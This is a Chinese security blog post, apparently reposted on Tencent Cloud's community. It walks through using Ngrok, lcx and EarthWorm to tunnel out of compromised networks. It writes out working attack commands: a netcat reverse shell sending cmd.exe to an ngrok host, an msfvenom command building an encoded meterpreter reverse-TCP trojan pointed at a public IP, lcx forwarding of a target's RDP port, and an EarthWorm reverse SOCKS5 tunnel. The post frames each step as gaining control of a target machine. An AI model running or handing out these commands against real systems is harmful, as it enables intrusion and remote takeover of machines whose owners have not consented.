前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >常见端口转发工具的使用方式(二)

常见端口转发工具的使用方式(二)

作者头像
ChaMd5安全团队
发布2018-03-29 12:03:49
1.2K0
发布2018-03-29 12:03:49
举报
文章被收录于专栏:ChaMd5安全团队

Ngrok

Ngrok一个反向代理,通过在公共的端点和本地端口建立一个安全的通道,其功能可以反向代理出web服务还有端口转发,这里我们主要演示端口转发的功能

由于ngrok这个工具官网是要访问外国网站的,所以是能使用国内的Sunny-Ngrok

反弹nc shell

首先我们启动ngrok

./sunny clientid 隧道id

本地监听端口:

nc -vv -lp 9991

目标机器:

nc -vv server.ngrok.cc 33388 -e cmd.exe

这个我们使用nc本地监听ngrok转发的本地端口9001,然后目标机器请求ngrok分配的公网地址把自己的shell交给ngrok公网开放的端口,ngrok把端口再转发到我们本地建立一个隧道获取到shell。效果如下

至此已经拿到了目标机器cmd权限

ngrok结合lcx使用转发3389端口

目标机器:

lcx -slave server.ngrok.cc 33388 127.0.0.1 3389

本地指定监听:

lcx -listen 9991 33389

然后连接我们本地的33389端口:

结合msf反弹meterpreter shell

首先本地开启ngrok

设置用来反弹连接的木马

这里我们都知道配置的时候要获取到ip地址这里我们要用到NetCat这个工具

nc -vv server.ngrok.cc 33388

msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.90.92.56 LPORT=33388 -b “\x00”-e x86/shikata_ga_nai -f exe -o ~/桌面/win.exe //生成反弹木马

配置好木马后,我们kali使用msf监听本地ngrok转发的9991端口,等待反弹马

msf exploit(handler) > run

目标机器运行木马

可以看到我们本地已经反弹回了meterpreter的shell

至此,感谢Double8前辈的博文。

EathWorm

EathWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透,跨平台!!!

该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)

这里介绍一下反弹socks5端口转发

公网Linux上:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

目标机器上:

ew_for_Win.exe -s rssocks -d 公网ip -e 8888

显示建立隧道成功

本地使用Proxifier工具进行连接

输入目标机器ip连接3389即可

至此,我们可以清晰的看到已经可以socks代理连接目标端口了。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-07-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 ChaMd5安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档